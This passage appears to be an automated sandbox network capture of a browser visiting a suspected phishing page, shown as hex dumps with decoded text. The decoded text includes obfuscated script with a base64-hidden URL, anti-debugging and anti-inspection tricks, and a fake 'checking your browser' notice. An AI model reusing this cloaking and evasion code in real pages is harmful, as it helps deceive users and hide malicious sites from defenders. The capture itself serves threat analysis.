                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IkhjWDRiUlBmTzNOQ2x5dldLdFVKMEE9PSIsInZhbHVlIjoiSVBVSDJNUXVuL3RRdEh2Vjl6YzQ4M2UyeFU4UHJqL29jWjJ0eDh1VXl4cWpBYXpTbmJjQ1pIMnNlMTV0bnkxV0pHVkNBcUMvRyt3TDAyUFBGUWx5eVY4U0JsYTlNTmZ1ZXJMRlNudmVaaVpmdyt0T2YySkpaeTIrYnBmblUvdUUiLCJtYWMiOiJmMDY0NDlkZmE0NjVmOGRmMWYwOThkMjNlMWQxOTEwMzIyNDEwNDI1OGRkOWE2MWNlNTY4YTAwNDA0NmRjMTdlIiwidGFnIjoiIn0%3D; expires=Tue, 26-Nov-2024 21:54:38 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                              2024-11-26 19:54:38 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 46 55 4b 33 64 35 54 56 59 72 62 32 74 72 56 6c 52 59 63 56 4e 68 61 57 77 30 52 57 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 33 70 45 55 33 4e 46 65 6b 35 59 4f 57 35 6b 4e 56 4e 69 56 48 4e 72 51 54 59 79 64 33 56 71 5a 54 63 79 55 6d 70 76 4e 44 63 7a 53 31 59 33 59 55 30 34 65 48 45 72 4e 6c 70 77 57 6d 6b 34 63 55 70 6f 55 55 64 6f 4e 54 63 32 51 7a 46 53 5a 44 56 34 4d 30 74 6f 56 31 4e 70 52 45 5a 6a 64 46 6c 69 57 57 77 33 4e 54 5a 73 65 47 70 6a 64 45 52 33 54 45 5a 71 61 32 5a 76 51 58 56 79 62 6a 52 57 55 31 49 35 4e 7a 67 7a 55 32 6c 78 59 54 4e 6a 59 58 4e 59 53 6c 4a 32 54 55 73 76 4f 55 31 6a 56 6b 74 79 54 33 4d
                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlFUK3d5TVYrb2trVlRYcVNhaWw0RWc9PSIsInZhbHVlIjoic3pEU3NFek5YOW5kNVNiVHNrQTYyd3VqZTcyUmpvNDczS1Y3YU04eHErNlpwWmk4cUpoUUdoNTc2QzFSZDV4M0toV1NpREZjdFliWWw3NTZseGpjdER3TEZqa2ZvQXVybjRWU1I5NzgzU2lxYTNjYXNYSlJ2TUsvOU1jVktyT3M
                                                                              2024-11-26 19:54:38 UTC1369INData Raw: 34 63 33 37 0d 0a 3c 21 2d 2d 20 49 20 66 69 6e 64 20 74 68 61 74 20 74 68 65 20 68 61 72 64 65 72 20 49 20 77 6f 72 6b 2c 20 74 68 65 20 6d 6f 72 65 20 6c 75 63 6b 20 49 20 73 65 65 6d 20 74 6f 20 68 61 76 65 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 49 66 20 79 6f 75 20 72 65 61 6c 6c 79 20 6c 6f 6f 6b 20 63 6c 6f 73 65 6c 79 2c 20 6d 6f 73 74 20 6f 76 65 72 6e 69 67 68 74 20 73 75 63 63 65 73 73 65 73 20 74 6f 6f 6b 20 61 20 6c 6f 6e 67 20 74 69 6d 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 33 65 44 63 75 61 6d 46 68 63 58 64 68 62 57 4e 76 4c 6e 4a 31 4c 31 4e 69 4d 30 39 46 59 33 55 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64
                                                                              Data Ascii: 4c37... I find that the harder I work, the more luck I seem to have. --><script>/* If you really look closely, most overnight successes took a long time. */if(atob("aHR0cHM6Ly83eDcuamFhcXdhbWNvLnJ1L1NiM09FY3Uv") == "nomatch"){document.write(d
                                                                              2024-11-26 19:54:38 UTC1369INData Raw: 39 44 51 70 39 44 51 6f 6a 57 6b 35 6b 51 32 39 33 61 6c 52 34 55 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 31 70 4f 5a 45 4e 76 64 32 70 55 65 46 45 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 51 32 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43
                                                                              Data Ascii: 9DQp9DQojWk5kQ293alR4USBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1pOZENvd2pUeFEuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTQ2cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC
                                                                              2024-11-26 19:54:38 UTC1369INData Raw: 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35
                                                                              Data Ascii: bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW5
                                                                              2024-11-26 19:54:38 UTC1369INData Raw: 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 78 56 30 5a 31 56 55 6c 76 61 45 68 31 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 78 56 30 5a 31 56 55 6c 76 61 45 68 31 49 43 30 67 55 55 46 34 53 47 6c 76 5a 32 68 46 51 69 41 2b 49 45 52 70 62 31 52 54 55 31 6c 59 65 48 55 67 4a 69 59 67 49 55 5a 56 51 57 35 4a 56 30 4e 35 53 45 6b 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 45 5a 56 51 57 35 4a 56 30 4e 35 53 45 6b 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67
                                                                              Data Ascii: GVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBxV0Z1VUlvaEh1ID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChxV0Z1VUlvaEh1IC0gUUF4SGlvZ2hFQiA+IERpb1RTU1lYeHUgJiYgIUZVQW5JV0N5SEkpIHsNCiAgICAgICAgICAgIEZVQW5JV0N5SEkgPSB0cnVlOw0KICAgICAg
                                                                              2024-11-26 19:54:38 UTC1369INData Raw: 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6d 5a 7a 56 46 70 52 52 30 35 79 64 6b 59 69 50 67 30 4b 52 57 35 7a 64 58 4a 70 62 6d 63 67 65 57 39 31 63 69 42 69 63 6d 39 33 63 32 6c 75 5a 79 42 70 63 79 42 7a 59 57 5a 6c 49 47 4a 35 49 47 4e 6f 5a 57 4e 72 61 57 35 6e 49 48 6c 76 64 58 49 67 59 6e 4a 76 64 33 4e 6c 63 69 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61
                                                                              Data Ascii: BlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9ImZzVFpRR05ydkYiPg0KRW5zdXJpbmcgeW91ciBicm93c2luZyBpcyBzYWZlIGJ5IGNoZWNraW5nIHlvdXIgYnJvd3Nlci4NCjwvZGl2Pg0KPC9mb3JtPg0KPC9ka
                                                                              2024-11-26 19:54:38 UTC1369INData Raw: 51 54 31 4e 55 49 69 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 59 6d 39 6b 65 54 6f 67 62 6d 56 33 49 45 5a 76 63 6d 31 45 59 58 52 68 4b 45 74 57 52 6b 78 47 54 32 74 43 62 31 51 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58 52 68 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 47 46 30 59 56 73 6e 63 33 52 68 64 48 56 7a 4a 31 30 67 50 54 30 67 4a 33 4e 31 59 32 4e 6c 63 33 4d 6e 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d
                                                                              Data Ascii: QT1NUIiwNCiAgICAgICAgYm9keTogbmV3IEZvcm1EYXRhKEtWRkxGT2tCb1QpDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgfSkudGhlbihkYXRhID0+IHsNCiAgICAgICAgaWYoZGF0YVsnc3RhdHVzJ10gPT0gJ3N1Y2Nlc3MnKXsNCiAgICAgICAgbG9jYXRpb24ucm
                                                                              2024-11-26 19:54:38 UTC1369INData Raw: 29 29 20 7b 0d 0a 50 6c 4f 44 50 4f 54 6c 55 4f 2e 70 61 74 68 6e 61 6d 65 20 3d 20 50 6c 4f 44 50 4f 54 6c 55 4f 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 77 4a 54 72 57 62 63 69 65 41 20 3d 20 50 6c 4f 44 50 4f 54 6c 55 4f 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 77 4a 54 72 57 62 63 69 65 41 20 3d 3d 20 43 43 67 4c 42 55 79 5a 6a 61 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32
                                                                              Data Ascii: )) {PlODPOTlUO.pathname = PlODPOTlUO.pathname.slice(0, -1);}const wJTrWbcieA = PlODPOTlUO.pathname+'/';if(wJTrWbcieA == CCgLBUyZja){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2
                                                                              2024-11-26 19:54:38 UTC1369INData Raw: 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 51 32 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 42 68 64 58 52 76 4f 33 30 4e 43 69 4e 61 54 6d 52 44 62 33 64 71 56 48 68
                                                                              Data Ascii: YS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTQ2cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNaTmRDb3dqVHh
                                                                              2024-11-26 19:54:38 UTC1369INData Raw: 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a
                                                                              Data Ascii: GVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5j


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.1649732172.66.0.1584436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:38 UTC787OUTGET /cdn-cgi/challenge-platform/h/b/jsd/r/8e8c6e58cb1b43b2 HTTP/1.1
                                                                              Host: 3riverscap.sbs
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8; ytb85vtlLNEaqVL6bVF11vMjOx0=1732650872; cOiOxvrWexZRQxekKrp9NKmvZuY=1732737272; fDN0wTGJWkBMHpJQE2V96znAEWI=1C-4GTPbBUrQHKBauwyqV8q1W54
                                                                              2024-11-26 19:54:39 UTC750INHTTP/1.1 405 Method Not Allowed
                                                                              Date: Tue, 26 Nov 2024 19:54:39 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              allow: POST
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJj3BHS6BdRRwSol2VxrGNHdB1ar43mO%2FviGjuRVKJa6l9ZNtA7Wd5v6lAg6jlIK8TBYxsFYNMonVnTxuHvrO1%2FkhXf05uAJmMVsaml%2B4%2FImZPpZr%2BIYwICxCItEmJkC3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e7a8a9f429e-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2179&min_rtt=1703&rtt_var=1590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1365&delivery_rate=529849&cwnd=193&unsent_bytes=0&cid=3c2b880dfa22a153&ts=687&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.1649735151.101.2.1374436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:39 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                              Host: code.jquery.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://7x7.jaaqwamco.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:40 UTC611INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 89501
                                                                              Server: nginx
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                              ETag: "28feccc0-15d9d"
                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                              Accept-Ranges: bytes
                                                                              Age: 2632955
                                                                              Date: Tue, 26 Nov 2024 19:54:40 GMT
                                                                              X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890087-NYC
                                                                              X-Cache: HIT, HIT
                                                                              X-Cache-Hits: 55, 0
                                                                              X-Timer: S1732650880.246993,VS0,VE1
                                                                              Vary: Accept-Encoding
                                                                              2024-11-26 19:54:40 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                              2024-11-26 19:54:40 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                              2024-11-26 19:54:40 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                              2024-11-26 19:54:40 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                              2024-11-26 19:54:40 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
